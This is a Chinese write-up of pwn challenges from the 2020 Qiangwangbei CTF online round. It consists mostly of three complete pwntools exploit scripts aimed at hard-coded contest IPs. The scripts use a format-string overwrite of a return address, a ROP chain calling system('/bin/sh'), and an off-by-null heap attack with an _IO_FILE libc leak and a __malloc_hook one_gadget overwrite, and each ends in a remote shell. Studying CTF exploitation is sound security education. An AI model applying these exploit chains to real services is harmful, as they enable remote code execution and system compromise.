
2020强网杯线上赛pwn题解

2020/08/23
#coding=utf8
from pwn import *
context.log_level = "debug"  # pwntools echoes every byte sent/received; useful when a step stalls

p = remote("123.56.170.202",12124)  # the contest's live service; the process() line below is the local-test alternative
#p = process("Siri")
lib = ELF("libc.so.6")  # libc shipped with the challenge; only its symbol table is consulted (lib.symbols below)

def fmtstr(payload):
    """Send one "Remind me to ..." request to the service.

    Walks the two-prompt dialogue the service expects and appends *payload*
    to the reminder text. Nothing is read back here; callers consume the
    echoed reply themselves. Uses the module-level tube ``p``.
    """
    dialogue = (
        (">>> ", "Hey Siri!"),
        ("What Can I do for you?\n", "Remind me to " + payload),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

def fmt(prev, word, index):
    """Build the ``%<pad>d%<index>$hn`` spec that stores the 16-bit *word*.

    ``%hn`` writes the number of characters printed so far, so the padding
    width is whatever raises the running count *prev* to *word*; when the
    count is already past *word* the width wraps around 65536. No padding
    is emitted when ``prev == word``. Returns the spec as a str.
    """
    if prev == word:
        padding = ""
    else:
        width = word - prev if prev < word else 65536 + word - prev
        padding = "%{}d".format(width)
    return padding + "%{}$hn".format(index)

#leak stack addr
# The reminder text is echoed back through a printf-style call, so "%7$p"
# prints the 7th positional argument as a pointer. The writeup treats that
# value as sitting 0x10 above the saved rbp -- an offset measured for this
# build, not derived here. (Server-side fix for this bug class: pass the text
# as an argument, printf("%s", text), never as the format.)
fmtstr("%7$p")
p.recvuntil("OK, I'll remind you to ")
rbp = int(p.recvuntil("\n",True),16) - 0x10
success("[*]RBP addr :"+hex(rbp))

#leak libc
# Slot 83 presumably holds a return address into __libc_start_main (231 bytes
# past its entry on this libc); subtracting the symbol offset gives the load
# base. Both 231 and the one_gadget offset 0x10a45c are specific to the
# shipped libc.so.6 and meaningless for any other build.
fmtstr("%83$p")
p.recvuntil("OK, I'll remind you to ")
libc = int(p.recvuntil("\n",True),16) - 231 - lib.symbols['__libc_start_main']
success("[*]libc addr :"+hex(libc))
one_gadget = libc + 0x10a45c
success("[*]one_gadget addr :"+hex(one_gadget))

#return one_gadget
# Three 16-bit %hn writes patch the saved return address (rbp+8) in place.
# The format specs come first, then the three target pointers that positional
# indices 55..57 refer to; each write is relative to the running character
# count, hence the prev bookkeeping.
pay1 = ""
prev = 27+4  # characters already printed before the first %hn: the 4 is the "aaaa" pad sent below, 27 is the writeup's measured value -- verify against the reply prefix
for i in range(3):
pay1 += fmt(prev,(one_gadget>>i*16)&0xffff,55+i)
prev = (one_gadget>>i*16)&0xffff

pay1 += p64(rbp+8) + p64(rbp+10) + p64(rbp+12)
print len(pay1)  # Python 2 print statement: this script does not parse under Python 3
pause()  # debugging stop; waits for a keypress before the final send
p.recvuntil(">>> ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?\n")
#gdb.attach(p)
#pause()
p.sendline("Remind me to aaaa"+pay1)
p.recv()

p.interactive()
#coding=utf8
from pwn import *
context.log_level = "debug"  # pwntools echoes every byte sent/received

p = remote("123.56.170.202",21342)  # contest service; the process() line below is the local-test alternative
#p = process("babymessage")
libc = ELF("libc-2.27.so")  # libc shipped with the challenge; the symbol offsets below come from it
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF("babymessage")


# Fixed addresses inside the challenge binary. The 0x40xxxx / 0x601xxx values
# suggest a non-PIE build -- TODO confirm with checksec; they are only valid
# for this exact binary.
leave_mes = 0x000000000400995
name_addr = 0x00000000006010D0
pop_rdi = 0x0000000000400ac3
puts_got = elf.got['puts']  # GOT slot whose contents are leaked below
puts_addr = elf.plt['puts']  # PLT stub used to print it


#change v1
# Menu 1 (sent "999") and menu 2 (8 filler bytes plus a pointer) presumably
# set up the "v1" field the writeup refers to; the exact effect lives in the
# binary and is not visible here. Both ROP payloads below start with the same
# name_addr+4 value.
p.sendlineafter("choice:","1")
p.sendline("999")
p.sendlineafter("choice:","2")
p.sendline("bbbbbbbb"+p64(name_addr+4))

#leak libc
# ROP chain: pop rdi <- puts@got, call puts@plt to print the resolved libc
# pointer, then return to leave_mes so a second message can be sent.
p.sendlineafter("choice:","2")
payload1 = "a"*8+p64(name_addr+4)+p64(pop_rdi)+p64(puts_got)+p64(puts_addr)+p64(leave_mes)
p.sendline(payload1)

# Takes the 6 low bytes of the first pointer ending in 0x7f. This assumes the
# libc mapping has a 0x7f.. top byte -- usual, but not guaranteed under ASLR,
# so a mismatch here is the first thing to check when the leak comes back wrong.
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,"\x00")) - libc.symbols['puts']
success("[*]libc base :"+hex(libc_base))

#get shell
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search("/bin/sh").next()  # .next() is Python 2 only; Python 3 spells it next(...)
payload1 = "a"*8+p64(name_addr+4)+p64(pop_rdi)+p64(binsh) + p64(system_addr)
#gdb.attach(p)
#pause()
p.sendline(payload1)
p.interactive()

easypwn

程序保护全开

Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

if ( !mallopt(1, 0) )
exit(-1);

mallopt(M_MXFAST,0)将global_max_fast设置为0,这个值的意思是最大为多大的chunk归fastbin管理,设置为0表示这个程序中不再存在fastbin。即本程序禁用了fastbin。

漏洞点:

zoeXML

edit函数处存在off-by-null漏洞

但是这个题没有show函数,需要改写IO File,达到leak libc的效果。

#-*- coding: utf-8 -*-
from pwn import *
context.arch='amd64'  # target architecture for the pwntools helpers used below
#context.log_level = 'debug'

# Retry loop: on any exception the whole exploit restarts on a fresh connection.
# NOTE(review): the bare except also catches KeyboardInterrupt/SystemExit, and
# the previous tube is never closed, so a persistently failing run spins forever
# and leaks one connection per attempt. The retry presumably exists because the
# p16()/p8() partial pointer overwrites below depend on randomized address bits.
while(1):
try:
p = remote('39.101.184.181',10000)
#p = process("easypwn")
elf = ELF("easypwn")
#libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
libc = ELF("libc-easypwn.so")  # the challenge's libc; every raw offset below is specific to this build

# Wrappers for the three menu commands. edit() uses sendafter, not
# sendlineafter, so no newline is appended: callers add '\n' when they want
# one and binary payloads go out verbatim.
def add(size):
p.sendlineafter("Your choice:","1")
p.sendlineafter("size:",str(size))

def edit(index,mes):
p.sendlineafter("Your choice:","2")
p.sendlineafter("idx:",str(index))
p.sendafter("content:",mes)

def free(index):
p.sendlineafter("Your choice:","3")
p.sendlineafter("idx:",str(index))

# Heap layout; the "#n" trailers are the writeup's chunk indices. The size
# values written at the end of chunks 1 and 4 (0x70+0x100, 0x90+0x100) rely on
# the off-by-null in edit() that the writeup's prose describes, so that the
# following frees and allocations overlap neighbouring chunks.
add(0xf8)#0
add(0x68)#1
add(0xf8)#2
add(0xf8)#3
add(0x88)#4
add(0xf8)#5
add(0x68)#6
add(0x68)#7
add(0x68)#8
free(0)
edit(1,"a"*0x60+p64(0x70+0x100))
free(2)
add(0xf8)#0
add(0x68)#2-->1
add(0xf8)#9
free(3)
edit(4,"a"*0x80+p64(0x90+0x100))
free(5)
add(0xf8)
add(0x88)#5-->4
add(0xf8)#10
free(7)
add(0x68)
free(4)
# Two-byte partial overwrite of a freed chunk's pointer. 0x37f8 is a libc
# offset; only the low 16 bits are written, so the randomized bits above them
# have to match -- the source of the retry loop above.
edit(5,p64(0)+p16(0x37f8-0x10-0x5)+'\n')
add(0x88)
print "Success unsortedbin attrack"  # Python 2 print statement: this script does not parse under Python 3
free(6)
free(1)
edit(2,p8(0x70)+'\n')  # one-byte partial overwrite
edit(7,p16(0x25dd)+'\n')  # two-byte partial overwrite; 0x25dd is libc-specific
add(0x68)#1
add(0x68)#6
add(0x68)#11

# Libc leak without a show function: 0xfbad1887 is an _IO_FILE flags value
# (the stdio-structure rewrite the writeup's prose refers to). The service's
# next output then contains a libc pointer, taken as the 6 bytes ending at the
# first 0x7f; 0x3c5600 is the distance from that pointer to the libc base for
# this libc only.
pay1 = "\x00"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0)+'\n'
edit(11,pay1)
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3c5600
pause()  # debugging stop; waits for a keypress
p.success("libc_base: "+str(hex(libc_base)))
# Final stage: the overwritten pointer targets __malloc_hook (the -0x23 offset
# is build-specific) and a one_gadget address is written through chunk 6.
# glibc 2.34 removed the malloc hooks, so this stage does not apply to current
# libcs; the shipped libc is apparently 2.23-era (see the commented path above).
free(6)
free(1)
edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23)+'\n')
add(0x68)
add(0x68)

#o_g = [0x45226,0x4527a,0xf0364,0xf1207]
o_g = [0x45226,0x4527a,0xf0364,0xf1207]  # one_gadget candidates in this libc; index 2 is the one used
edit(6,"a"*0x13+p64(o_g[2]+libc_base)+'\n')
# gdb.attach(p)
add(0x100)  # the allocation that triggers the hook
p.interactive()
except:
continue